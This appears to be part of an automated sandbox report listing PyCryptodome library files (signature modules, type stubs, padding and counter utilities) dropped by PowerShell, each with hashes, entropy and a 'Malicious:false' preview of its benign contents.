                                                                                                                                                                                                              Preview:.........l.e..........................(.....d.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.y.).zG.Legacy module for PKCS#1 v1.5 signatures...:undocumented: __package__......N)...pkcs1_15c.....................T.......|.j...................|.|...........y.#.t.........t.........f.$.r...Y.y.w.x.Y.w.).NFT)..._verify..ValueError..TypeError)...self..hash_object..signatures.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/PKCS1_v1_5.py.._pycrypto_verifyr....)...s3..................[.)..,..............."..............s..........'...'.c..........................t.........j...................|.........}.|.j...................|._.........t.........j...................t.........|.........|._.........|.S.).N).r......new..verifyr......types..MethodTyper....)...rsa_key..pkcs1s.... r....r....r....0...s5.........L.L....!.E....L.L.E.M.....#..#.$4.e..<.E.L....L.....)...__doc__r......Crypto.Signaturer....r....r......r....r......<module>r........s..........>..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):401
                                                                                                                                                                                                              Entropy (8bit):5.402701031456713
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:AJm0VF1mikQ4NS1u+n7Z//2Iktpjag2O6:AJm0VTkNS1FZX2xCg2L
                                                                                                                                                                                                              MD5:1DC1C9835C36EEA143B26F184D25F259
                                                                                                                                                                                                              SHA1:78FBDAC6304935FC8D659944F56039AAC419C9EC
                                                                                                                                                                                                              SHA-256:323950BB96300E4FD1B12E52C72116D9FC6201702A05D241DA45429DA6F1AD03
                                                                                                                                                                                                              SHA-512:873A9BBDAB985755DB31AAEFA5FAD97A78FAF04F8AFE16322A129D4CC1ECD8F2662C4456E6B89C8990A3716941C364CC80E34F9EE9ED684FA0391C467267844D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e................................d.Z.g.d...Z.y.).zeDigital signature protocols..A collection of standardized protocols to carry out digital signatures..)...PKCS1_v1_5..PKCS1_PSS..DSS..pkcs1_15..pss..eddsaN)...__doc__..__all__........mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/__init__.py..<module>r........s..........>.......I...r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14138
                                                                                                                                                                                                              Entropy (8bit):5.226892498359152
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:di/VFI1fVFbYcmp55ImSkaMHYD5V66lQedAAso5HVxCEfa:0IFbQImNaMHQbEAN7ta
                                                                                                                                                                                                              MD5:17F19BBE8F5FD25B091419EDA64415D7
                                                                                                                                                                                                              SHA1:D148E0AA8132492F03FFA23B7FFC28E1637D8ABB
                                                                                                                                                                                                              SHA-256:74E2D15966779252FDE49E4075FF455A7268216A9B05DDF475C79F06545AADAD
                                                                                                                                                                                                              SHA-512:EA4EF9F26BA8E7616E3B3B4EDEB5C7536B576D90495B5CBB302ED94838545388163DF96BEC23EDAF517909C968891472E8877031427269D5A9FA5CFAE6A0D53C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.1........................r.....d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d...Z.d...Z...G.d...d.e.........Z.d.d...Z.y.)......)...Integer)...SHA512..SHAKE256)...bchr..is_bytes)...EccKey..construct.._import_ed25519_public_key.._import_ed448_public_keyc...........................t.........|.........d.k(..r.t.........|.........\...}.}.d.}.n6t.........|.........d.k(..r.t.........|.........\...}.}.d.}.n.t.........d.t.........|.........z.............t.........|.|.|...........S.).a....Create a new Ed25519 or Ed448 public key object,. starting from the key encoded as raw ``bytes``,. in the format described in RFC8032... Args:. encoded (bytes):. The EdDSA public key to import.. It must be 32 bytes for Ed25519, and 57 bytes for Ed448... Returns:. :class:`Crypto.PublicKey.EccKey` : a new ECC key object... Raises:. ValueError: when the given key cannot be parsed.. . .....Ed25519.9.....Ed448z.Not an EdDSA key (%d by
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7403
                                                                                                                                                                                                              Entropy (8bit):5.424874183336652
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:sL2tHYkks5L9t+Mtmp5NOZHpvplryOect1VpqqLdVVssre8kzCLxgvgk6ZdJuuXe:Ouj5htB05N0wytZqqLdPKCwgk6fte
                                                                                                                                                                                                              MD5:80E014D8C7DCF337E8478013589B0266
                                                                                                                                                                                                              SHA1:3AB979F9EA133CA0D683716AE054A9D8EC36564B
                                                                                                                                                                                                              SHA-256:A62506D5CAF683FD8CC62CD633BBEC7AC3E0CF68A7E98E1EAF131374470F8DEA
                                                                                                                                                                                                              SHA-512:6D056D710171AAEF6AF25BBD17E053E6C13CFA97CD1873B53CE69A475EE7534221BE7F1E10D20DF85C24BA59788F590F63F87CB7947F6DE6574218D1566030E4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.#........................Z.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.........Z.d.d...Z.d...Z.y.)......N)...ceil_div..bytes_to_long..long_to_bytes)...DerSequence..DerNull..DerOctetString..DerObjectIdc.....................(.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.y.)...PKCS115_SigSchemez.A signature object for ``RSASSA-PKCS1-v1_5``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pkcs1_15.new`.. c...........................|.|._.........y.).a....Initialize this PKCS#1 v1.5 signature scheme object... :Parameters:. rsa_key : an RSA key object. Creation of signatures is only possible if this is a *private*. RSA key. Verification of signatures is always possible.. N)..._key)...self..rsa_keys.... .mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/pkcs1_15.py..__init__z.PKCS115_SigScheme.__init__)...s....................c.....................6.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14333
                                                                                                                                                                                                              Entropy (8bit):5.382597998424615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:jXo59h4tDrSbbCzgREsNPGiRRFUcwFKFqUkBO8lpBlYozys:jY5vIc28qsVGiRRWFKspOaBe/s
                                                                                                                                                                                                              MD5:0D661203ED88913F6F5B3376F64A8514
                                                                                                                                                                                                              SHA1:F58A3F8BAF7EE72B51490DF558C25459D9CB77BA
                                                                                                                                                                                                              SHA-256:72AA22A6F21F9D75D45876B258C72D45B4A7D6CBC300DF437650BCD6D3BBB156
                                                                                                                                                                                                              SHA-512:6394A7965166959D4372CF88A0A61FC1FEBE4B04CD3B2F7B2AE5A3AEF0BBE6648F4CF2D55CBCE451ABFC7D39FA76C49A5D97177472DE745FA6500CB47EEB9E94
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.6........................x.....d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.d...Z.d...Z.d...Z.d...Z.y.)......)...bchr..bord..iter_rangeN)...ceil_div..long_to_bytes..bytes_to_long)...strxor)...Randomc.....................(.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.y.)...PSS_SigSchemezvA signature object for ``RSASSA-PSS``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pss.new`.. c.....................<.....|.|._.........|.|._.........|.|._.........|.|._.........y.).at...Initialize this PKCS#1 PSS signature scheme object... :Parameters:. key : an RSA key object. If a private half is given, both signature and. verification are possible.. If a public half is given, only verification is possible.. mgfunc : callable. A mask generation function that accepts two parameters:. a string to use as seed, and the lenth of the mask to.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12758
                                                                                                                                                                                                              Entropy (8bit):4.953249726457768
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:6qrskrs9t3q/IVQVluiDVluYQu1s1NuMMMt:Frskrs9VqMlB1L
                                                                                                                                                                                                              MD5:0A4AF23CD5DF55B2C6E57D27689FCD5C
                                                                                                                                                                                                              SHA1:EAC0752A6E323C8A7EEB4D740268364526422DB5
                                                                                                                                                                                                              SHA-256:2DC65C619AFC2F1F5D170FA8FC67998B78FEB6ECC9EA4A3375AFE3C10AB37348
                                                                                                                                                                                                              SHA-512:E540382C6CCBACA754AED2B9F9A0D90938A37A00ED27B3829AD69B6089EC267767BEEB10968FD30BA7CBA586E20EB2DA6FE5D5ABC69AFA77AFE935C5D2D3482B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):747
                                                                                                                                                                                                              Entropy (8bit):4.991320777959256
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBlRE1BvxS+1dw1z4L556trLuh72tR5A8TTo448/u4Jw1AL1A19YRG98mfvIs:1REOC1++161z4Nfh7IGhI+1mAl9Zfjuk
                                                                                                                                                                                                              MD5:F75719D633E9543F8B2191818F5F949E
                                                                                                                                                                                                              SHA1:50C2F1E8A90E757A473DDD36FA897EBA33B52786
                                                                                                                                                                                                              SHA-256:AB1B0BBE6DF0B563E17CF22EB3DCE37DAC436C836F19A3498647B6A167BC2C45
                                                                                                                                                                                                              SHA-512:B5472537D636DB5D8EE6BADEA791816C4E6B052D899AB443D8BC5CB5E4721B1C1B79160F114FEC8A289578566084D3B5C8E7E0385066A331FC9864465BBD0541
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9088
                                                                                                                                                                                                              Entropy (8bit):5.053423261865839
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/ISM97UQFA2CEkoA3KhNzYaomc:0rskrs9VqdM97UQFAM+go
                                                                                                                                                                                                              MD5:8DD798B530CC55801BC2744A469CD46F
                                                                                                                                                                                                              SHA1:70FBA1485270D0F63B5C676B2AFC0CCAF606A06F
                                                                                                                                                                                                              SHA-256:2E59C1BB1C7A738F51343213C94F49503CB91BAD07D906272FA44BCC1CEDD8FA
                                                                                                                                                                                                              SHA-512:82DBDDC02494535B90B4388ED6698CBC4F90A0589B32A5D693C8134BF682007896E47C0055C222FE89260AF21CE8E0D4F639CEE61F02677893BD82937C310173
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):581
                                                                                                                                                                                                              Entropy (8bit):5.067047688730709
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLRwlbQgA85A3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+LRwlbf
                                                                                                                                                                                                              MD5:DC28B90A844CBE3BCE2F14FBAD339B51
                                                                                                                                                                                                              SHA1:920E136B27895D970DE44FC61B00180D4DB686F2
                                                                                                                                                                                                              SHA-256:E2CE13431A88DD8206D23EF6C0E1935B61795A97166309CA8FBED78D68AF6FED
                                                                                                                                                                                                              SHA-512:BC0C4D5F5FD2DB593B00144EB4DDC1BEE12B71CA399CC08C25F00C11B0463404B64FD20F2A13FC91B83ED7DE03E132AA1E968D12373D96E74BFDA0C4CA68A105
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13970
                                                                                                                                                                                                              Entropy (8bit):4.861341757640308
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IFlYlgXJ0rcUfsOg58VFJbAVFtn3sxliqu8:0rskrs9Vq+GgXirHfsv8VEVP8/RL
                                                                                                                                                                                                              MD5:2A9F316CD479BB56AE101218E1B96816
                                                                                                                                                                                                              SHA1:3E63E6B6F8D771082C7DFF39B827BBB55BDA5CA9
                                                                                                                                                                                                              SHA-256:47736BFBB2762DEA089BE962E283E1E1155C51A2280C1839F5494B5BA9B72973
                                                                                                                                                                                                              SHA-512:C0F595025D3C77DB448177FFFAEC7FFA82FC021F08A351E00644CCA0F1006B1D68B4D6D567D242D56040CB7180D8B69DDD592C9ED85D653C34F8CCA026DCB84D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1071
                                                                                                                                                                                                              Entropy (8bit):5.102431129383602
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LAu8Bo633XfD7:Jy+1o3xf1ov2GovRLAVnPf
                                                                                                                                                                                                              MD5:505820D514B9F7B2244301F2DC317034
                                                                                                                                                                                                              SHA1:A90CFF03252A14134E286EB646ED62D9B82E076D
                                                                                                                                                                                                              SHA-256:0A62FC61A9C9A60FDADEFBCF20BCAD59140D16C09E4485A28820F9D14B156ACE
                                                                                                                                                                                                              SHA-512:B5A534C52FC07BC8E0A145F628857381F7A8F4570459A83D3DFD4BFB0A6BD526465C1291CB8F2714F5B8A02D12A3403FBEC6B666BE49608B87D3CA80E10D8EC8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKey, *
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3292
                                                                                                                                                                                                              Entropy (8bit):5.003098854081704
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:MRwEIB0jcQHMsvI/S3oCFGAZUqjZibFduSmZpoRE3bpJ5U:MRwfFQHvo2Uq1cFYSYpCE3bpJ5U
                                                                                                                                                                                                              MD5:25E5852A52182CBF645AC075BDE04C8E
                                                                                                                                                                                                              SHA1:5431574C5E607B91EE33D90D2DBD52E6634622A5
                                                                                                                                                                                                              SHA-256:E0D9B91A882D3986EF288761C85527F658E552B9A48B02AD630896A10B155F9B
                                                                                                                                                                                                              SHA-512:8AE1F5A17386A33B2C6E4D9360C2CCFEA10549DCDDAA920919B12C8FF4975AAA536E759C5C98885E9863194381B3C9B1E40D935C2562C80786CC9EEAE238A4BD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: ascii -*-..#..# Util/Counter.py : Fast counter for use with CTR-mode ciphers..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                              Entropy (8bit):4.705947008789207
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                                                                                              MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                                                                                              SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                                                                                              SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                                                                                              SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4421
                                                                                                                                                                                                              Entropy (8bit):5.191112640865006
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:e1tDqrYJALrYJHdt3EHGuI2gHdYUI1e+GJF37gR8C91/ErvyGAhQyAk:e1Vqrskrs9t3q/ILxF379aGyQyh
                                                                                                                                                                                                              MD5:FBF391FD249DDBB1C32502AC42999B5D
                                                                                                                                                                                                              SHA1:9559F22269BBE2A0F918705DED635B8CC666DD10
                                                                                                                                                                                                              SHA-256:A04416E7AA698FFFC0301EE284720426B69E9A3BCB2A0C7E954A054698C29405
                                                                                                                                                                                                              SHA-512:4241AEF302C010640C2FA86D92F2EE7EA34A865F759D14C02024F62A3452C593C0BCCABFE46043E879EB1CD73A290F85C0DD106A294684F628C100EA06382DF9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# Util/Padding.py : Functions to manage padding..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):243
                                                                                                                                                                                                              Entropy (8bit):4.823438083026704
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                                                                                              MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                                                                                              SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                                                                                              SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                                                                                              SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21578
                                                                                                                                                                                                              Entropy (8bit):4.591349548627808
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:aPe4cRum4V+EE2tKm/8MboR6U/6LcleM6s4riu6gvZGVSRq67:DAfHQgRGVe37
                                                                                                                                                                                                              MD5:73AEDFB55D3A90F08A29CC5D0AB7E623
                                                                                                                                                                                                              SHA1:D576725EC2571123AFE056369B58063BFB9D7724
                                                                                                                                                                                                              SHA-256:DFDB8CD578E00E485AD2070F24A3CFD7B0E75C972EBA73912B0BB59D8D67193B
                                                                                                                                                                                                              SHA-512:BB63BA3D20FC92A942F16C35E0128AEB2810310F75778FD6218D037D40AFFFCF3E19FFADE08882C0EC781548EACB5588A5B5A964E96FC5753CF44A9053EAADFD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# rfc1751.py : Converts between 128-bit strings and a human-readable..# sequence of words, as defined in RFC1751: "A Convention for..# Human-Readable 128-bit Keys", by Daniel L. McDonald...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DA
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):166
                                                                                                                                                                                                              Entropy (8bit):4.7074966574817525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                                                                                              MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                                                                                              SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                                                                                              SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                                                                                              SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....
